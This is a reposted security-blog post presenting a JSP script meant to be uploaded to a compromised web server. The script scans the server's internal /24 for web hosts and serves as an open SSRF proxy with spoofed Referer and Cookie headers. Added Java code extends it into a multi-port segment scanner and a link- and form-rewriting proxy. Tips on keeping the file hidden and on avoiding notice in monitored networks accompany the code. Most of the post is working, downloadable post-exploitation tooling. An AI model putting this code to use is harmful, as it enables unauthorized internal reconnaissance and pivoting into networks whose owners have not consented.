JSP internal network probing script & simple proxy access

暗月博客 · 2019-11-21 21:28:14 · 549 views · 4957 characters · 16 min read
Summary

1. Visiting the page with no parameters scans the C-segment (/24) of the server's own IP and collects, for every host that answers, the page title and the web container (taken from the Server response header).

2. A different segment can be scanned by passing the segment in the ip parameter.

3. Proxy access takes a url parameter and fetches an internal web page from the server's vantage point. The CSS files the page references are fetched as well and inlined, so the result looks as close as possible to a direct visit.


<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%@ page isThreadSafe="false"%>
<%@ page import="java.io.IOException"%>
<%@ page import="java.io.InputStream"%>
<%@ page import="java.net.InetAddress"%>
<%@ page import="java.net.HttpURLConnection"%>
<%@ page import="java.util.concurrent.LinkedBlockingQueue"%>
<%@ page import="java.util.regex.Matcher"%>
<%@ page import="java.util.regex.Pattern"%>
<%@ page import="java.util.zip.GZIPInputStream"%>

<%!
  String referer = "";
  String cookie = "";
  String decode = "utf-8";
  int thread = 100;

  // Open a GET connection with the spoofed headers; 3 s connect/read timeouts keep dead hosts cheap.
  HttpURLConnection getHTTPConn(String urlString) {
    try {
      java.net.URL url = new java.net.URL(urlString);
      HttpURLConnection conn = (HttpURLConnection) url.openConnection();
      conn.setRequestMethod("GET");
      conn.addRequestProperty("User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)");
      conn.addRequestProperty("Accept-Encoding", "gzip");
      conn.addRequestProperty("Referer", referer);
      conn.addRequestProperty("Cookie", cookie);
      //conn.setInstanceFollowRedirects(false);
      conn.setConnectTimeout(3000);
      conn.setReadTimeout(3000);
      return conn;
    } catch (Exception e) {
      return null;
    }
  }

  // Read the response body as text. Returns the literal string "null" on any failure;
  // the callers use that as the "host did not answer" marker.
  String getHtmlContext(HttpURLConnection conn, String decode) {
    try {
      String code = (decode != null) ? decode : "utf-8";
      InputStream in = conn.getInputStream();
      // gzip was requested above, so unwrap it here; otherwise the title regex sees compressed bytes.
      if ("gzip".equalsIgnoreCase(conn.getContentEncoding())) {
        in = new GZIPInputStream(in);
      }
      StringBuffer html = new StringBuffer();
      java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(in, code));
      String temp;
      while ((temp = br.readLine()) != null) {
        if (!temp.trim().equals("")) {
          html.append(temp).append("\n");
        }
      }
      br.close();
      return html.toString();
    } catch (Exception e) {
      System.out.println("getHtmlContext:" + e.getMessage());
      return "null";
    }
  }

  // The web container is read straight from the Server response header.
  String getServerType(HttpURLConnection conn) {
    try {
      return conn.getHeaderField("Server");
    } catch (Exception e) {
      return "null";
    }
  }

  // Concatenate every <title> element in the page and strip the tags.
  String getTitle(String htmlSource) {
    try {
      StringBuffer title = new StringBuffer();
      Matcher ma = Pattern.compile("<title>.*?</title>").matcher(htmlSource);
      while (ma.find()) {
        title.append(ma.group());
      }
      return title.toString().replaceAll("<.*?>", "");
    } catch (Exception e) {
      return null;
    }
  }

  // Pull each href="...css" out of the page, fetch the stylesheet with the same connection
  // settings and wrap it in <style>, so the proxied page keeps its look.
  List<String> getCss(String html, String url, String decode) {
    List<String> cssurl = new ArrayList<String>();
    List<String> csscode = new ArrayList<String>();
    try {
      Matcher ma = Pattern.compile(".*href=\"(.*)[.]css").matcher(html.toLowerCase());
      while (ma.find()) {
        cssurl.add(ma.group(1) + ".css");
      }
      for (int i = 0; i < cssurl.size(); i++) {
        // crude join: works when url is the site root and the href is relative
        String cssuuu = url + "/" + cssurl.get(i);
        csscode.add("<style>" + getHtmlContext(getHTTPConn(cssuuu), decode) + "</style>");
      }
    } catch (Exception e) {
      System.out.println("getCss:" + e.getMessage());
    }
    return csscode;
  }

  String getMyIPLocal() throws IOException {
    return InetAddress.getLocalHost().getHostAddress();
  }
%>
<%
  String u = request.getParameter("url");
  String ip = request.getParameter("ip");

  if (u != null) {
    // Proxy mode: fetch one URL from the server's vantage point and echo it back.
    decode = request.getParameter("decode");
    String ref = request.getParameter("referer");
    String cook = request.getParameter("cookie");
    if (ref != null) {
      referer = ref;
    }
    if (cook != null) {
      cookie = cook;
    }
    String html = getHtmlContext(getHTTPConn(u), decode);
    List<String> css = getCss(html, u, decode);
    String csshtml = "";
    if (!html.equals("null")) {
      for (int i = 0; i < css.size(); i++) {
        csshtml += css.get(i);
      }
      out.print(html + csshtml);
    } else {
      response.setStatus(HttpServletResponse.SC_NOT_FOUND);
      out.print("Request failed!");
    }
    return;
  } else {
    // Scan mode: sweep the /24 of the given ip (or of this host) on port 80.
    String threadpp = request.getParameter("thread");
    if (threadpp != null) {
      thread = Integer.parseInt(threadpp);
    }
    try {
      String http = "http://";
      String localIP = getMyIPLocal();
      if (ip != null) {
        localIP = ip;
      }
      String useIP = localIP.substring(0, localIP.lastIndexOf(".") + 1);
      final Queue<String> queue = new LinkedBlockingQueue<String>();
      for (int i = 1; i <= 254; i++) {   // .0 and .255 are never hosts
        queue.offer(http + useIP + i);
      }
      final JspWriter pw = out;
      List<Thread> workers = new ArrayList<Thread>();
      for (int i = 0; i < thread; i++) {
        Thread t = new Thread(new Runnable() {
          public void run() {
            String addr;
            // each worker drains the shared queue until it is empty
            while ((addr = queue.poll()) != null) {
              HttpURLConnection conn = getHTTPConn(addr);
              String html = getHtmlContext(conn, decode);
              if (html.equals("null")) {
                continue;   // refused or timed out: nothing to report
              }
              String title = getTitle(html);
              String serverType = getServerType(conn);
              try {
                // JspWriter is not thread-safe, so serialise the writes
                synchronized (pw) {
                  pw.println(addr + "  >>  " + title + " >> " + serverType + " >> Success<br/>");
                }
              } catch (Exception e) {
                e.printStackTrace();
              }
            }
          }
        });
        workers.add(t);
        t.start();
      }
      for (Thread t : workers) {
        t.join();   // hold the request open until every worker has finished
      }
    } catch (Exception e) {
      out.println(e.toString());
    }
  }
%>
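The scan mode above does one job well enough, but it has a few limits that the author lists further down (one global encoding, a single port) and a couple that are structural (one thread per loop iteration, a busy-wait until the thread group is empty). The following standalone Java program is an added example, not part of the original script, that keeps the same idea (one GET per host, report the title and the Server header) and addresses those points: a bounded ExecutorService instead of hand-rolled threads, several ports per host, gzip unwrapped before parsing, the charset chosen per response from the Content-Type header or a <meta charset> rather than one decode value for the whole segment, and hosts that answer 401/403/404 reported as well, since those still reveal the container. The seed address 192.168.1.1, the port list {80, 8080, 8000}, the 50-thread pool and the 3 s timeouts are assumptions for the example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.zip.GZIPInputStream;

public class SegmentScanner {
    static final Pattern TITLE = Pattern.compile("(?is)<title[^>]*>(.*?)</title>");
    static final Pattern HEADER_CHARSET = Pattern.compile("(?i)charset=\"?([\\w-]+)");
    static final Pattern META_CHARSET = Pattern.compile("(?i)<meta[^>]*charset=[\"']?([\\w-]+)");

    /** Expand the /24 that anyIpInSegment lives in, times the port list, into http:// targets. */
    static List<String> targets(String anyIpInSegment, int[] ports) {
        String prefix = anyIpInSegment.substring(0, anyIpInSegment.lastIndexOf('.') + 1);
        List<String> out = new ArrayList<>();
        for (int host = 1; host <= 254; host++) {      // .0 and .255 are never hosts
            for (int port : ports) {
                out.add("http://" + prefix + host + ":" + port + "/");
            }
        }
        return out;
    }

    /** Per-response charset: Content-Type header first, then a <meta charset> in the first 2 KB, else the fallback. */
    static String pickCharset(String contentType, byte[] body, String fallback) {
        if (contentType != null) {
            Matcher m = HEADER_CHARSET.matcher(contentType);
            if (m.find() && Charset.isSupported(m.group(1))) return m.group(1);
        }
        String head = new String(body, 0, Math.min(body.length, 2048), StandardCharsets.ISO_8859_1);
        Matcher m = META_CHARSET.matcher(head);
        if (m.find() && Charset.isSupported(m.group(1))) return m.group(1);
        return fallback;
    }

    static String title(String html) {
        Matcher m = TITLE.matcher(html);
        return m.find() ? m.group(1).replaceAll("\\s+", " ").trim() : "";
    }

    static byte[] readAll(InputStream in) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        byte[] chunk = new byte[4096];
        int n;
        while ((n = in.read(chunk)) != -1) buf.write(chunk, 0, n);
        return buf.toByteArray();
    }

    /** One probe. Returns a report line, or null when nothing spoke HTTP at that address. */
    static String probe(String target) {
        try {
            HttpURLConnection c = (HttpURLConnection) new URL(target).openConnection();
            c.setConnectTimeout(3000);
            c.setReadTimeout(3000);
            c.setRequestProperty("User-Agent", "Mozilla/5.0");
            c.setRequestProperty("Accept-Encoding", "gzip");
            int code = c.getResponseCode();                 // throws on refused / timeout
            InputStream raw = code >= 400 ? c.getErrorStream() : c.getInputStream();
            byte[] body = raw == null ? new byte[0] : readAll(raw);
            if (body.length > 0 && "gzip".equalsIgnoreCase(c.getContentEncoding())) {
                body = readAll(new GZIPInputStream(new ByteArrayInputStream(body)));
            }
            String html = new String(body, pickCharset(c.getContentType(), body, "UTF-8"));
            return target + "  >>  " + code + "  >>  " + title(html) + "  >>  " + c.getHeaderField("Server");
        } catch (Exception e) {
            return null;
        }
    }

    public static void main(String[] args) throws InterruptedException {
        String seed = args.length > 0 ? args[0] : "192.168.1.1";   // assumption: any address in the target /24
        int[] ports = {80, 8080, 8000};                            // assumption: the ports worth a look
        ExecutorService pool = Executors.newFixedThreadPool(50);   // bounded worker count
        for (String t : targets(seed, ports)) {
            pool.submit(() -> {
                String line = probe(t);
                if (line != null) System.out.println(line);
            });
        }
        pool.shutdown();
        pool.awaitTermination(10, TimeUnit.MINUTES);               // no busy-wait on a ThreadGroup
    }
}
```

Run it as `java SegmentScanner 10.0.0.1` from a host that can reach the segment; the same functions drop into the JSP's declaration block unchanged, with `main` replaced by the request parameters. The charset logic matters in practice: a segment with both GBK intranet portals and UTF-8 admin consoles produces garbled titles under a single decode value, which is exactly the first item in the to-do list below.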

Parameters:
ip [the IP segment to probe; any address in the /24 will do]

url [the address to request through the proxy]

Other parameters:

thread [number of worker threads, default 100]

decode [character encoding used to read responses, default utf-8]

referer [spoofed Referer header]

cookie [spoofed Cookie header]

Two practical cautions. Once uploaded, the script is an unauthenticated SSRF proxy and port sweeper that anyone who finds the file can drive, so give it an unguessable name or gate it behind an extra parameter check, and remove it when the engagement ends. In scan mode the default of 100 threads fires up to 254 connections from the application server at once, which stands out immediately in flow and proxy logs on a monitored network; start with a small thread value.

To be improved:
1. A single C-segment may contain sites in several encodings, so one fixed decode parameter for the whole scan is not enough.

2. The port should accept a list so that several ports (80, 8080, ...) can be probed in one pass.

3. The proxy function is incomplete: loading JS and images, rewriting hyperlinks so they go back through the proxy, and rewriting forms so they submit real requests are all missing.
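Item 3 is mostly a rewriting problem: every reference in the fetched page must be made absolute against the page's own URL and then pointed back at the proxy, and forms need special care because a browser drops the query string of a GET form's action, so the target cannot be carried in `?url=` there. The class below is an added example, not the author's code, that does that rewriting offline on a constructed sample; the proxy path `/out.jsp`, the page URL `http://10.0.0.8:8080/app/index.jsp` and the hidden field name `url` are assumptions. Links, scripts, images and stylesheets get `proxy?url=<absolute>`; forms get `action="proxy"` plus a hidden `url` input, so both GET and POST forms arrive at the proxy with the real target and the user's fields together.

```java
import java.io.UnsupportedEncodingException;
import java.net.URI;
import java.net.URLEncoder;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ProxyRewriter {
    // href/src on links, scripts, images, stylesheets; form actions are handled separately.
    static final Pattern LINK_ATTR = Pattern.compile("(?i)\\b(href|src)\\s*=\\s*([\"'])(.*?)\\2");
    static final Pattern FORM_TAG = Pattern.compile("(?is)<form\\b[^>]*>");
    static final Pattern ACTION_ATTR = Pattern.compile("(?i)\\baction\\s*=\\s*([\"'])(.*?)\\1");

    static boolean leaveAlone(String v) {
        String l = v.trim().toLowerCase();
        return l.isEmpty() || l.startsWith("#") || l.startsWith("javascript:")
            || l.startsWith("data:") || l.startsWith("mailto:");
    }

    /** Resolve a possibly relative reference against the proxied page's URL; null if it is not a URL at all. */
    static String absolute(String ref, URI base) {
        try {
            return base.resolve(ref.trim()).toString();
        } catch (IllegalArgumentException e) {
            return null;
        }
    }

    static String proxyUrl(String absolute, String proxyBase) {
        try {
            return proxyBase + "?url=" + URLEncoder.encode(absolute, "UTF-8");
        } catch (UnsupportedEncodingException e) {
            throw new AssertionError(e);   // UTF-8 is always available
        }
    }

    static String htmlAttr(String s) {
        return s.replace("&", "&amp;").replace("\"", "&quot;").replace("<", "&lt;");
    }

    /** Step 1: links, scripts, images and stylesheets point back at the proxy. */
    static String rewriteLinks(String html, URI base, String proxyBase) {
        Matcher m = LINK_ATTR.matcher(html);
        StringBuffer sb = new StringBuffer();
        while (m.find()) {
            String abs = leaveAlone(m.group(3)) ? null : absolute(m.group(3), base);
            String out = abs == null ? m.group(0)
                : m.group(1) + "=" + m.group(2) + proxyUrl(abs, proxyBase) + m.group(2);
            m.appendReplacement(sb, Matcher.quoteReplacement(out));
        }
        m.appendTail(sb);
        return sb.toString();
    }

    /** Step 2: forms submit to the proxy itself and carry the real target in a hidden "url" field,
     *  because a GET form would discard any query string placed in its action. */
    static String rewriteForms(String html, URI base, String proxyBase) {
        Matcher f = FORM_TAG.matcher(html);
        StringBuffer sb = new StringBuffer();
        while (f.find()) {
            String tag = f.group();
            String target = "";              // no action means "submit to the current page"
            Matcher a = ACTION_ATTR.matcher(tag);
            if (a.find()) {
                target = a.group(2);
                tag = tag.substring(0, a.start()) + tag.substring(a.end());
            }
            String abs = absolute(target, base);
            if (abs == null) abs = base.toString();
            String out = tag.substring(0, tag.length() - 1) + " action=\"" + proxyBase + "\">"
                + "<input type=\"hidden\" name=\"url\" value=\"" + htmlAttr(abs) + "\">";
            f.appendReplacement(sb, Matcher.quoteReplacement(out));
        }
        f.appendTail(sb);
        return sb.toString();
    }

    static String rewrite(String html, String pageUrl, String proxyBase) {
        URI base = URI.create(pageUrl);
        return rewriteForms(rewriteLinks(html, base, proxyBase), base, proxyBase);
    }

    public static void main(String[] args) {
        // Constructed sample standing in for a page fetched from an internal host; not a real site.
        String sample = "<link rel=\"stylesheet\" href=\"css/site.css\">"
            + "<a href=\"/admin/\">Admin</a><a href=\"#top\">top</a>"
            + "<img src='../logo.png'><script src=\"http://10.0.0.9/lib.js\"></script>"
            + "<form method=\"post\" action=\"login.do\"><input name=\"u\"></form>";
        System.out.println(rewrite(sample, "http://10.0.0.8:8080/app/index.jsp", "/out.jsp"));
    }
}
```

On the serving side this implies two more changes to the JSP: run the rewriter only on text/html responses and stream everything else (CSS, JS, images) back as raw bytes with the upstream Content-Type, and, for a submitted form, read `url` from the request, drop it, and forward the remaining fields upstream with the same method as the original request. With those in place the inlined-CSS trick in `getCss` is no longer needed, because the stylesheet link itself now goes through the proxy.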

By the way, this is mainly a lazy shortcut, or for internal-network penetration when the various proxies keep running into problems and cannot get out. Waiting for some expert to write a complete version.
(If I do it myself I will have to improve it bit by bit.)

PS: It has been a long time since I wrote any code; the code is rough and I still have not learned multithreading properly. It seems you have to write code every day to stay fluent.

Link: http://pan.baidu.com/s/1qWDsv3e

Local download: out.rar

Published by 暗月博客 on 2019-11-21 21:28:14. Reposted at CN-SEC中文网 (with thanks to the original author); keep this link when reposting: https://cn-sec.com/archives/72766.html
